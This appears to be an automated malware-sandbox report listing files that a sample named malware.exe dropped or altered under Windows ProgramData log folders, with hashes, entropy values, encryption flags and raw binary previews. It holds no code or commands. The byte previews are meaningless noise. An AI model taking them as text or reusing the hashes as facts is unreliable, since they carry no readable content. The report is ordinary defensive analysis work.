                        Preview:h/....0h.....>..7+..3... ...._.d......<F......<...;r8.$......Jy.^r.y.x..s.0......k.....)....prR ...~.,..!.........A......M.....:.....b..uL.p}PD...X.....').o........K..[.Uy..P...H....l....h]ja.&J...........eR....O.=....|.....UNi.'uh.!8.@L#....f...U$nC....9...6.pw...OB.h..R..E.7....K..H9....r4kE.=(X.s.....2.N..e....c....."..0.X[.].)#..l..L...rnu~.D8.u....43..Da,.U..vp ..........G..K.+.ES0..Y....h$...Lw8....#...L......lr.uv.F...gR.......4..*.Uk.;28sj...p.$U...@.O.s..Q|....C..0..k.p.:..E.....^m...<....^..'...v.k..+.._.B.]..du.....#...j..-Z.$S..2.b..I..b..p..B,.3..:.40......X..F...6..C......p5.......R..v=.b,#..r.R:..7|.....:.~..w.c[r...40.0.>..o.j].7W4.P&=........>.t9.q..ED..U.d...Y.O.>}..\....`..?.%C/F|..p.A.+....Gb|`8.2.g.....[T...j...q...t..M...s?.../<.\/...s..]...rL._.j..&q.d........m...Ec...b..^...n3....{C.u.$N..?.7.GZk..?...j(.|..t6..h.....v.I...!.3PU..\. %....g..'.Z...S.*.,..=.....HQm#.....oJX..t....$...G.....cY..z.d,..'.......l.uB.......'

                        C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32876
                        Entropy (8bit):7.994980419535519
                        Encrypted:true
                        SSDEEP:768:1LSjGZ3YA+6BVVg2Pns6BOiWtyQ+VMHEXKgMyxCmVg23o1h3ZuqLSis:1mS1jns6BOiwyetyBg23oXZuqef
                        MD5:A44009191DB36D95AA3F6180AA25CFBE
                        SHA1:DCC525B502B8B12AE83F4DBFDA57DD5E6F80C7AC
                        SHA-256:E281A5E069D865DC3DE804978347A3A5BE9FB4D7D7A2AD9ED63CE1E4127F8A49
                        SHA-512:7CD0B73964393304CDDD9D28427DE607E7E43310C5D15787F9C61D03DBED78612202C81D52515CF58EA53343EB1C783422923688FFE50CAA78035B6212DF0372
                        Malicious:true
                        Preview:.Oa[OM...eY!......@D.F..`....Y..93.9....L....0\....X&....|.......K...sOG.......]..<A.;...s.L@)B..L...]..u]:c......l0Y....=..0.w...9G..dR.}.\....._Z.....v...(..gO.~..]..O../..9.I.F..Q:...u....|.V0..Z.sWp..(YF..7p.|#C.....J...;...6T@`.\...g=.C........n...g...r....QP.9...?...heIK....9.|t.H..<np..r......W6.R....I.2.E..U./4.E.Ce....C.t.&...}..#....@..\..I..X...s.....$..W.....~.[.Xv...;......fa8....yp/g%.'..ZO.;Y....'..wN..e0.r..G.ZJ.eb.n. .....Q.+-.g..U...DT?..N..S.z"........V..nJ....).%.T..S......@=....a......Mq........d..u.7Q:...0iVW+rh.... ..|4N.\*..q...1...l..NT.z.A#..b....9L.;[...I.>.n..d..WwA...5R......x..N.>1.w....&.B1{k...A.m.K......m.pM..=..A9.......>*...^o...l..O....V.Xs...&`...k.......k....y..U..-...........0.m.J.|...\..Gy.E.Ytb..l.+.U..m..s.:.q$.t.e.'1.{.....u<+E.....%K..?K).lz..8<.;(.2..g..}...Z._...E.W....}KkN.......9....Z.wl.......N..EAG.....=7...Z..1C(.6J.].tv.B..{.....Wu.k....<pXw..U.P......M...a..yKc...8`+.......=<r..

                        C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32876
                        Entropy (8bit):7.9943086885679575
                        Encrypted:true
                        SSDEEP:768:ymE0Nl+QvC7byriaPo3zNVBrKwo8/8eUj+ZaYeptto:ymEZQamHSJzKi/83SoYmA
                        MD5:7C19A5D8509892D31D302A51D6038335
                        SHA1:AFB83D28C138CEB1E99FDE303B055002A53D1687
                        SHA-256:898273479D5A7366439F3713EA9E9F1177FCC7560EF9E47D8E2535AEFFC59FEB
                        SHA-512:7EA6AA7DA4F84239D2C4267860AD2757061709F66AEDFCCFE7D71180B6F6BDFE35EFAE6F62B08E9879CD5C403E2C2D5F303F20FC6159BB225BB15F6556AE91EB
                        Malicious:true
                        Preview:.e.#3.l..T....I.2;.N[.-..Y*:!..W.D!Xr0.*..*.I....!T...HyB.L.....)3..He.h.`..=%.V.L.j.C.v..7Y(.Jk...!....v..Vr9...W....]xs.DEQ...fz..M.....<.O..iy.m.,.......... jh....\>....W..!.I.";.S..%K...]f.C;.E..<....y.>..........#..Y..#X[...........1....i....Er$..\F.uK^....P..eq7wB..aU..RG....p.Zk9........[e.AL...mO.P.p:.;X4k..^Mu..asF..6...-..4...'.e.......M...v2..(.P.x*.K.8.z`.S9.v=......`..gjg...".w.V..q.;w{.X.;..Z..tx.......$.L7.....h... U&.j.`=J..._..U[.....O.J..f.....T$cz..4a...g......B.....xbu.}-.>.t../Y..?...h^.,6.1........aIh`...&`.UN:..//..c..4|aH.Y~.3.8...z..\p~..C.n...P..4o_t:f.|...l...M.../....0..Va.V%A[(;....f-a7.....H.f#..`8.(.l.#j....Q..\#.\....l5.[.....^.3%...:.l...4c...&..|..6.j..U.a.6...:....vv...n......cZ3a@.8>..h2..........(..u%?.R0w.E4:P1V~.. ..|ra....8.."......b.4%.&..S.f.).D....=......-...p.8.4*#.Z.tx.....a.l|..Qnt.....%.G...K..i*P.}...E..-P..V...."'[.K.D.....Mk-E<..#....4.Dj.)ks.l$+m.<..].3M;.0.....t.<.Y.`RI...........W.).

                        C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-120003-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:PGP Secret Sub-key -
                        Category:dropped
                        Size (bytes):12396
                        Entropy (8bit):7.986213220196508
                        Encrypted:false
                        SSDEEP:384:SLYeXL2apk+0+AtsbYk17Urw/D3y5pxlIg03yuGo:LebcsAObY67S+30xl5fo
                        MD5:331EAFAE918B70F67D9F76DD6712CF84
                        SHA1:54DD26243B72E912E56C7C4A800EDE16D3EDADC8
                        SHA-256:C8600A20DC8355FD63C5E6C207C7522BBCC0E70C68EB818C6753E5C48770DD5B
                        SHA-512:84EA8550CC44E75D17D122F058424D9692EF271788DA11BC86D8FB1ABFFB9677A5E5FDEB67B5A31EE9D3A27FE08C333107A73B40473EF72B2D8610AD1EC3CA90
                        Malicious:false
                        Preview:.."ps......).9....O....t.U._...>.!.".;..c.Fv.)...^hCkot.(n.Q._.D"......Z....B.R.Q..$..w.d.<KW./.D Y..B../..S.5Fg..$h........:...o......3...Q3.S.'..e~rA9.1..!._.Qn..~p..^.2.f.(........."....%..4c;Jf...........]..X....TJR...y.u.2L,.$.<.^..tU....g../.....|..~u..[z.Z....9.T#.@&.3.l...>2R.....a.....^.d.Q^......W...l.W.!R.....C.A...`.....M.t.h..<d*.Fd.k....BL..B.$.{.G..={..........]......Me.0.k!..O>.gI... .....Hc...*V..%..LE..x..$.(.sI.@..h2.....q.U..i&..U....9......W.j/..d.&...E.:{...........8..=.T...+.S.....Tz..{.........h.....Sg;6..U($b....L...0...}$.h*...eWG......_.M....i%..=......wN.....'y.DS_.).0.p.....^zV..F....p.Ikq1..?.....\.......].3.`8...@....}yf.:.!S1M..<W.. $..5Z.......o@...d...'......Bkb.......(..-.y.i.X(.......K...$.*....J.O..p.........7e....q....{ls..W.v......|4.).lr.J.D%.eB'x#}.{..JM-..-.c.&..uRJ..].Q.....a.S=...X...R.}P....p.x...9m...~..T.6;..z.t:....8......(HdU".._F....sj..fduu.<..?5....5.0.G3.!....,/.....1..70J..i...V3..I..

                        C:\ProgramData\USOPrivate\UpdateStore\store.db

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12132460
                        Entropy (8bit):6.03413978298754
                        Encrypted:false
                        SSDEEP:98304:Wxh4jS+f2D8FsmhhAbd4vLBD77NQxnNRGPWIAOkrZJGdWPfjopRk03Y:WxL8RqkuHGPrGOdWPYR73Y
                        MD5:E8A8FD743F77A5DF2C6BC1451B6F7EDE
                        SHA1:880BB9A0EF864D9406F89D4D2E37D0414442B355
                        SHA-256:58367D959D1E2B86B816F08AF379CB4FEAAC9898D487F6B7ADCD4F57CCDB7EEF
                        SHA-512:A74E572954EB1E06547DD9903AB31EF9E86EB26DE61412561CC94B12EC2FE836C21CE186D07C0806792E62C4F376FA7780EB62C9085CA8E186668F3AA0B6A43E
                        Malicious:false
                        Preview:.f.f{.>AB..#..<.n...WF@.Rt3(K...xO.\p.K..7.i.S?..".G...T..m..m....P......u.+...o.=0...3.(..>.F..L.@g....2s......4H...{uS..tq.2..........%6e5^..@m...r{.......-..3M.. ....B...8...5.....0./.S.hel...J..-..b..w......X.vS.......~.#.....B..5BA.o..l'.yF.1.t.;<.7..f..n.&...s...}j...........v2..(...k/.}..}.T.....DS.h........o..F..<.!.c0...6.Cx.....H._..6..:d}BEmo.".....b..0......n......J..o...u../.....B.q0...B..hw..^;.......I...~.z1.D.'~.....,>.1e.Wb.IuV..k.".a..+.r.{."g..9......b...s......f..o..y\.+....'....M.A......J..n.......n..&r..4#.A....w..AY.b....tB....y...7...}.._:...E..].8.{.m..]....%. ._......8...xC....p.G+G.......8.....(.j.9,..tK...O....m.....'...0.?..{.6...;....V.}...'G..N}..I...:%.u..WPA.-..G...p......K[?...$._.S1e..C].e...O$.x.}.2..v.+.N.j.(.:....PS....0h.k.Y.l..x.../..../.."=9..h.[..,j..z.L....E..n2bmF.'..m.*.^...SNj.Pi.H...;P........rO.....y...$[{7.&L....[..a3.1.I_..N.N.w...A...^..<'u,.D.5..,.U'..y..j.<<..7..Rt........m..R.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.03156670-ff72-4555-893a-7529a6b7b380.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53356
                        Entropy (8bit):7.995876098078394
                        Encrypted:true
                        SSDEEP:1536:w7jH13tquDOYLiHobF7NNXWZplW+E9pBHv2Fym+hMoX:QH1dDOgNbpNNXWTlW/pBHYJ+qq
                        MD5:82A4A87877004380C6A46B6F3564CADB
                        SHA1:714498C3F4B0D62FF5FF08E54E610CED53A246DF
                        SHA-256:9047BC98BBE8563685EC02AC9BAEBA5C5E4A8A6F0BD8941B7F9D5F1A7B44B31D
                        SHA-512:F3DCD22A143C5CE9626D0159AB60436999642FA4C86DE4A3B8CE0D90FD9D18B044148A5B35C6385E126FADC6524932DCCF5157DDD34EE5EAF04E426B96C05EF0
                        Malicious:true
                        Preview:Oh.Yv2.....Uu.Q......i.@F..@.....toG}......}....k.jQ..Z..oH..[.$6U,...u.. .Jq..3\.....j.....A..P....S...z....A$.A..H....P_...v".CH..$....ow.+.._./..).&.<..Bg..Ef..8..);j2.#v.B..$hc.3.nV:...W#...]..CF...B..B.#......&9@..R.S. ].?\2..Xp...0u.).t.p..P.....7.5$....w....$~........{..g.bcz,..5. ...a.y..+v.....v......H9.3N.D.H.%...?.].!-..q.`1..b'......&...B.N.gG..+..F.. ..fY1;...n.nr...i.>.....7Y..".R3t..Hy.P...A..*.gL.(y...r.6..i..}.Q"~/..5i..-64.,J.\9y.v.-....w/..........64.R;..oH?..K.OP@..S.Q.".. jF..(v^..MI.t.....#.k.U2;..$............+.RoB..v.LMNG.(-..;.......N..LGz.`....E......2..'...u..m ;5~.+...?..8$...OO..Z....Z.:.....%...v.Yc4...H...zh..al...........h.....a..5hH7x..&r......).@Z.......".bu.?*...\C.0*g.,.F&..'..!....6...Go.......~..n|`W.....y....P.tK........%/...,.J....c..=.U....R.w.z....-.....?.....e..oX4.kc}.w..^.....C...1.._..u........&Jj.v.....r...AJpw.{..69...Ij!.l..~..O2..v4H.v.U._^s.....q..z....}1.."[.!.....J. .d..'..b...f'...;..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.03b90911-d494-4396-b759-a499bbf9552e.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.996711126970886
                        Encrypted:true
                        SSDEEP:768:rOvk9LW2b7t50UaTkhpnwqey2Kdx1vh0cesAmCqnsascrBE9zSwS//Q:rvWU2UaTG9LeX0x1Z0cesA3osUgS3Q
                        MD5:30480AD02C0FF7BED890723674AF1E99
                        SHA1:53CD448CE7EB7361942D6288E8BD70D6043D7D55
                        SHA-256:CDA16CB367691FF89460DA18FE6896F218FC67F50D9FAB5C3D5D8CAF2EDF5636
                        SHA-512:32B70A6ACF315BD9AD8A0E23D8A4F2BBF46B76BC09A43C2113B601E7CEF066BFBD70E0912DD0066330E915EC177B26E0F09F269C8D1CB07DF421BE5040A965FC
                        Malicious:true
                        Preview:..h.s!..N&.n=......|IV..D.-L...e.o....>&.B.Y...dH^(.X...T%.(].".........Y.".j...K..2O.K.../n.1..H..|.b.,'.....,..C.|..Z[...P@B...UK"A|.....]..[.....1...=gc..<S.i+.9&3uJ|....YB.(..?.c...R.._..x....k.......$M....{8..1.K..$V.*3....h..N..d&\.....c9..hKZ...r[...6....A.zg.H.......;..%Y.....`*.r.....j..8..:.@..}.......-....^.J...>.h.S........!)m..r.....7f.f[Cs..'.PM../.......#..:..-.....-.....H.IO.hj...H..b.H..v).Xj'b"1L/[F=.%.b..F.U$.....,.2Fu...+..v..........%V"b.../{...u+$J...t...Os..xWI*G2.`D.A..#..F...P`.?......@......uf..U!..,.<.U...._1....-..R.I4=2...ze.N....../..an.......Z....a^gt.....9bb.t$5z.vi....h...+mz/..$...T.......~...`.%.g4Q....`z...V..Y..E...d.........P...Z.......c....Z= ..|..z.j.o....*i..?.........!.{...a.."..Y.@..K)m..>n....$8..^z..hF...x~.5.l..7.uA.t~...W...1...Lb...C:/`.0MXj............t..3J#...g.+..Pn.%fQ..k.....q.....%..*.....8.J....46.......<..ht..$...8^T.{B.9.gS:..lr.<..>.qb.9.k......#......-.h...V..:......

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.097adb72-8dc9-4f20-a3ce-f53355ac0c6f.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997678084002942
                        Encrypted:true
                        SSDEEP:1536:+5Zc7mxw53UgeIKsVN/EqA2dbzNOjzUyeiWoCEumM1CUzbv17Hp8HmCWwZu:+DlI3UgwudXIjC4Uzbv1N8j0
                        MD5:FD35D4BC4781B71092BA8CBCFB5A0CB0
                        SHA1:DCFCBC8D3D8EE4223761AA65C2FFF38D8A01D6F9
                        SHA-256:9EC44DA5DDC88BD1A07D2F0F5758D9027887BA2CD23DEEB2A7FF7F840845C952
                        SHA-512:FE05DF0619973280A3258CAF487A1140875E3F7164565D699DE7381CA4A65AD6CDAB58CDC38C03DA36ADA46A59141CAA12C272D6D257D778A09D7F62A6F96F11
                        Malicious:true
                        Preview:.X..*.|.>.......b/..+w..[..:....a.|..d...^..P....g ...0.....W....ry.U.....`.Y.....D.L.@......@8Y'<.|)n.Z..8.uw.)....[u..Z;n.....XX..MVMHQ..f.....9..'c..s.ri.H..e.{....]'T.bh'.h#.@.. cY'u.....J.<%C.....V..'nP..h.q0..Z.......w...~....^.....9...9.p..'yOI|.t.prp..#"c.0.F......i(...........G.......J....I..9>......+.X....!.x.s.t...;..g|.......J..LvRC.."W...#.*.I@jK.i\.).F..~....bw......a.C...(<.........$.......'...)....;.P......?...T-.|.....^..p....=.JpL..S4q....0..5.C....5y..*o.a...s.C....].[.v...'.'...A.'k.K}{.VDq.x.~..*.......0.,.7.a..<....v........C3.+.HL\......E.m.?...S.!v.H.=.1..\.6..hq.<..%I5q.o....n.....0...rT.i.y...i.G....u.>_e..I..Y....\.u0F..W... v......p..Z.{q..|...\.:~.v.n...cC..9...w1...z...Y..N..9ZfuB.br..c7.aM)....q..=.Pm.......&.0!.\......+.MRV.V..R..WG.3jh.j.@....<.*V.....~....l.U..l....7....L.g....fN..I....d...EeC..{..4.!.N..3.g...Wh....Z0..8..(Cd...~..Y.)...n...\.7.*.......~.......s..b..v.H..>8H..D.!._j..|]....x.....HE.5...

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.097adb72-8dc9-4f20-a3ce-f53355ac0c6f.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24684
                        Entropy (8bit):7.993362576242717
                        Encrypted:true
                        SSDEEP:384:zxLiIIrRhLihJCfQ5h6x4Y9GGuHDR7rm6DCMC4V+if1Ya6QHSrlnM4hJ9rGO:NiEjGUh6x4Yk7rKMCgfuaJb4NrB
                        MD5:1A45CC5B89E529D71E75D02BE5B07B9C
                        SHA1:218D483318420BF552153AE8495FBD0B14710121
                        SHA-256:A768FDA4E603519A53C758B40B64E7EDC62E60724ACB0DA90A122C742ED1BF8A
                        SHA-512:1DD2DFBEB2B7801631D1C1630A8DAE6D5B2016906097413D7005B66FE1F9D21890422E858949D3AAB5A335290F8DA8C19B7F2BD73F4F279E28CF7F7E531B5619
                        Malicious:true
                        Preview:..,..F>-..p.qJ.....+......pf.....v._Zf=.Gu.D..5..+.....m.k._n..)?^j)....\.)x...\.h.L~Gyh...kI./U/"d..R......2..h\/1... 3....\b...|.JZ.mrA.....^. ..P5.L..T!(G....`........d...:....$*.r{...'.....s..S.|...Q!...V..$.F..<.6~..NL.R_T"4.t1..$E.v.?'....nj.......Zx..)..M..;...8..:.#....S@.7eM.a.....V............}4...(.*.......K.2..Q<r+..h3..o..=...%...-.~.:.......:L...&.|;....N./.z[.*......o..:(.g...c..aV."....|.(..R..."N.[@.L]..|.;3>.E..P....M....|......7E!.a~\..c.VC[.w^...f .....s.....<..d".....|..Z..f#...n..T..q......K...G..J..0.)"....TK.6.+BM...Z...+[.d..s"............_..x._..C..47.?..@.a..1......B....*...B...n.`kK..Nd....L..../w-:7.K.n.x...F.N`{.ua..r.\....C3...Z.OM....S_^..J.H.....J_MW..^.".~.....$....;.1...d...!J..C>.B....L..Y.\._..-[..}Y..*....A...t.=.+n.....x..Xi..].))&.....T.AtM.Nj.t..=0.xMX.q. T';fL=I.D.e..t.!}..G.<!.+.1.......EP.RT...^...+.'....w.Baq.g.O0..7....D.fv.w.O..u.=*..d.O......D.XF.xk.."..<...... ...:P..j........#.......0G1+C....

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997479708335947
                        Encrypted:true
                        SSDEEP:1536:tlUpOrwmLFbzclRlGWKK6ONqJ8PuYmdbAHHlVF07838xlRSxJ4:tOMwmpncJp7NqJecdbCHlVaNbRSxi
                        MD5:3CF22C9CB8A96C0E061FD471C33893F0
                        SHA1:71AC3A27E934D387B08E6DCC5F3E726DA30C304C
                        SHA-256:970ED88343EA07266A63B7325B7D6837E74F2CFAE1B030D7804AAD7C2C4EF749
                        SHA-512:DC7590A2514B752DD88E0184D37D35A3C4F793341DAFB8A314019138278A4CBFE897D931031A96A5B13A175CF8C0384FDEBFB5626761F8077EF7EFAC95FE638F
                        Malicious:true
                        Preview:..-Z..Er....h.....dO,.m......=.....Z...%6.........($.]~.Z..|....:``..5.......[.x.[......(.....l....+.J.8'n.hqj5{u....7C'...Z.js.R.r.j.l....Q...df"6....]hSr....SM.V..x..Lf.+.'.-....z...7..L...o...-.f.w........5..8...&...<.........y.@...p"_h....K.*.9..~....4I=.i&.tS....9..+...}.\.......c.s ..g..c,^..=..'....[0.E.L..6.....#......VJ.....0S.]"6C+..k.......I.E.K._Q.7.&..Q+..`..Q9'...8i...P..{.>.O>7N.......s....Z.4*..\.=.N..%...C.Dn;.......y.<.......@.c....7.....O....?.{.,.H....l..;p..|q.....*...u.~\.E.|...+..)..S.....".18..j.p..J1lD.'/....c..FD.N.7P^.#..[..Qo....:Li).,.......xA...T..2..v.6..x./.g...H....-..Fg`BND.T..b....`\'...5....k../..s.2..i..........Z.@....5..q.$R.;hw........:wj..7NG....2.E..gZ..k.`x..-V... Q.}.<..a.K..Ep@g.+........\/..v........8/R~.G.3lf.:1eO..C...;.QTY..b.{..|=o"H.-D..j.4.k..W...M..b.....D.....y.N..|_.y.#.B......,.X..Cnl....U.%........&.I.{..5.4Ul<....\C....2..mL,.=n.~...v.r..B..D>../{?...6J..{.!wAu..?.Tj.x.c.wa..H....b.Uy...K

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997511240580545
                        Encrypted:true
                        SSDEEP:1536:akUwB5cnq3eIIFgLxD5PsZuzy54zsHeJUsQZD26qqbQTLmu15:ZBIWeIkgXssyazsHPZD26qfTjD
                        MD5:098530C1DACB62E12C34456161BE8B88
                        SHA1:942A2097F9C8D74632975F30AC0FF4EBB37E906E
                        SHA-256:0CFF24BE2BF4429502E5B358B74F7F1E12D87E9602759DCB69039EBA4B704C7A
                        SHA-512:E5413E282687EC28A8EFA45442F5978845997955BE6CA558C69F47C6A3175751E6E88D65140F9B4222731CF9A587F6F9F4FBA21B81C80FE74124CE2E9DF6672B
                        Malicious:true
                        Preview:S..O@."2..e..V.=.Lj.<.2.....R=.m.]..J/....y.....O......=.KlA..`....H..t.1,...8....5..S.0...d........*[.~.&,W.q....:..,J.......C.9@....$..-o.@..f.....k.-.w.E46.U[.%N.P..?.....IH.yGW.?O. OC..6Y..4...F^h.H.P.?.}A`..N:.X....`9.F....:>.r...,...Q..a%.....W?...........],........=..`f....j.?+.k...!s..H.L.........Z.2..-..R..D.......4U.4.....B.Y4.k8...u.Y.7^7-$.W.......t.n..W....x..D........e...<..o.:.!.e.0.P............I..QA.Yi.....#.xk..b......./S]..D....o..h|....I..g i..q.f..oV.4.>.2..\.QO.9@..u..t..S.`..C...9...g.......(....SGmp...T..=.%...mW~.G.b.}.....L_6...yy.+..(..]...J8..6f].oI.....!....-p.....u.%..{.3....:.$_..A...k./..w...`. 8...MO......8.2..'....b.........".m.d!.....y......u.`..R.H..r......E..g.zsN.h..6\].@!..".p./.B..U.....;.{.G/.&.....6..$.......i....Tz..q.uq.....T..$}Y.i.........vI.>n.b...{..B.z....m.......e.N.W&.~9...Y.o..^XO..!.i.).6....v8...lU...^b(...i.G.....&.y......H..;..bmj..y?Rp.r9...9.aQ........J...La....?..O::o.0......@P..=I.u

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.3.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997526256600883
                        Encrypted:true
                        SSDEEP:1536:N1B8eTEhI7fFmz65pm13mJbLO7GCOI83T2a3DZqjH/ut+BMKBhWjXYN4f0:ryeSI7dmOj5LO6COr2FjU+NMrYaf0
                        MD5:4B9908D4171BFF78FEA386DA469F0E6F
                        SHA1:2C83B3B0EB463BF8915EDCACEA9FE986756A2762
                        SHA-256:0DFF41A45B2C947ED1BE4EE91910D0F48D2CB4A714F2D04EB6C52633D10B9EB5
                        SHA-512:679BB5EC9C763A631EEB05EC292E7BEEE182A0A4C77364A58D367B113E680167517D72C2F0F35BE05D4FE23F2F83CE74E8E2268F0A4726972D6812E1D62F2277
                        Malicious:true
                        Preview:X..W..s.y........NB..4.?d6.+.....k........),.1U..).o.....v.JD...1..j.!.>G.LU2.....1.pV..sRe..U8..........u.a..3...54.#!....BA.Z.~;..#........~..C....QHV.V:>.42.'x8.U.B.#.o.F..L.7.`.W".......:.........<Z0.#.%..m....p.....\/..w^.4..y..+..].(......5.V.....H.~.<||..9.~.i....).....v...8....=`.3.)!.. .j.i..bl.5.o..[..:.f..m.j......a...D.8..y.N...+.rh..<oQ!jt...ZYd..A.B.84..3..g...uS...I.2`#.:.p....H".E......G3.&..).....j.....p..EV.E.*.).t....Jj..o..........!z.....sw3..dY.".q.1o...N.reO........%.s-..6.J..~.`.)V{.^.".q..O....."...l_.g..H..g..'......B...`@.....x.....:.R.m0.s.T.Uq.Kh.+)~.......b.:.l..X..T.]u..y.LVtzc..Q..%.x.'.Z..k.]....\...m."bK..Vg...h=I..l8F..i..|...|... .F.FW.N.HZ..6t....G0..F.MK.X#.....%.=.hF......p.5.3..b{..Y.:...2.H...6&...zj|8n%.....s.DJ...h.{.Bs.]tO",.. .1E..B*^..bb-..V .M.ML.,..zlb....|.\..[o3.%.j....x...Y... .../.WH.k..q..'..e'.:.....5K`~.5.g%...|.........^b....w...*.F.][N..+........?.x.|...V...5i....."..#...~;.e. .1.+..4.aKDM..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.4.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997654624106271
                        Encrypted:true
                        SSDEEP:1536:o0IXmD2T2pdrNTilAaIVLRA4fB0f+t1GE1X1QYUxHBlz4sPiYG8:FIXm2QTybp4fB0fK1GER1F2EaTG8
                        MD5:50E0D3562F3E353CEC95C9951DB32C8E
                        SHA1:D609DEF2157679D4248801AAC2F56C92801029B9
                        SHA-256:1A591D1650F288143669E0F17BB545C752A9E95EAA49BFF31EF544717FDFDE3E
                        SHA-512:B0E9ACF25A63CE53336414652047347990A06C9C7D8E7BB10105197E9FA8BD6CFEF90E7AC3013BF4089FE53006DEB60A656F6B71406E7689E9DEB90FAB106E65
                        Malicious:true
                        Preview:W.1.[E#..@k...N.i4|..&..T..G....B.7^....e.c*....O.3..9....{."O.....I.3^.3...'t.....E.m..I#wPp..jk.R.c..z...o.....2...J.........Z..n1./;...n.m..+emS...{........bH....s....;.<AC...)..@.:.)6.P.(....r..I.....d....d..?.#.B..X...&.A..U`..U.....}D....!avj.~............B.._..m..~:....%.......'j.$_..E.L.......M%.t.bz....*...An.n/e..=1..?....)U..._.....|$...QG.TA.zyX|.|.2..$(\..}1,..mZ.<...@..(..?-iW..Y-0.....(......9..<U.[..O...J.4.I.`...F...|..$N...w].\..Cr.f`.O...#.o.#....c..86iL..@.=...|?_....?-...q..`......H....X..m3...N.......8...z.&H.....jh.T.g.4$b....1.....V5_=...Q...'.Q.%.i...n.......~.PP>.HD..E......7U.d...*..v.y..NCM........4.......<`..N.....+.8^..a.06."...e".B...x..R0.S.s=.].9(.2G..)_nzIg......YA.........].i=lx.!%.$.k.....,.2.W.E....\u.q.xO..s.E......U..].d....^...Z.<.z./....4.uJA....M...s......y,t.....d.n......F.^.....k?....S>?U0_..6"..~./_..3.....J.`...;.@k...D...M.J.T.i......Y<.........^.(/.2/..e...\.`7%(..i.....A.wD.";5`.Z

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.5.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997651939167888
                        Encrypted:true
                        SSDEEP:1536:nwB+V1BDMuGUtderGaBfHlnAM6WBWEMTSfpnpCWId+cZqDRqhKa9tikY6y:wy1SB4WVMgfCWI8IGGKa9thy
                        MD5:26981AF8E85EEAFDC324C269593EE8BC
                        SHA1:302663531D79526F1A43229731E616BD91390C81
                        SHA-256:F828FC524809D9DC8B97BC873C4A06DE8A45C207CE65D6A8F27A46F73D4A17A7
                        SHA-512:B8009D5FCFDC15119D4F4C34CB2708AD49AB1C261CB10D044B7198EE60B305338D0331B21A7205A50097502C676290BA6242EA63043B75B369A0E664488E1A39
                        Malicious:true
                        Preview:.... .a...s......:~L.=k..wd8M. .B.H......h...~1NeP.Wa.2.......wZY.....sk.1.X .[.N....n ..-I....W+.m*d....N..:.uKY..4[1F..p.....q.."O...0.1..`N..@.d.....i<q.#t<.._.%.=p.... ..Fj.g.'l..'........k)...d3....?....]..O...{..zl..o..wlq..T.U>..B...{ew@V..MX..cPjB..2O\vd:..-^......-..N..(...N.&S.....a....,y..^.?XT.../U.5..3r.u.<..o.`.....X.[..t..,......+...8...rX.@.....JR5.*..n.5u.[.7..8...6.U.%.{&.......}!......B..O1..z.\.*@..Eu...1.7.b.^.C.0...p*^.U}9..4U.....^g....G"-.......zY.........P..X.p...+...5.....|Ev:t..r.. =..Q'..e5.W.9)q.$?w..Q!rY......a.....BH1.5?`...o.|Qh.G.]....i-_.$.{..^..&Uj...I..yFs.p.e.....J.kV(.l.....w..............SV(...aW......q..v./7P.:.;o....#...I..n.|.h.-.`.z.\.V...3q.....$EF....g.B?..sF.^.....Nw..-..}.....%.%....499.C.?.q.=e1.b0#.A.E.I"C.=.-. I.-........?.t.CI1..g..c<.|W....5......\...n(.l]......E...l=K.....}.L.gPT.N..d..<.u.&.z...._..Gu......N...Xm...R~<.=?T.sB^.A....#....p6.....eR:|.)..n.e.iV...3.A$..(.1.p....`

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.10e221af-8b7b-49e1-82db-e9c28f0459bf.6.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):36972
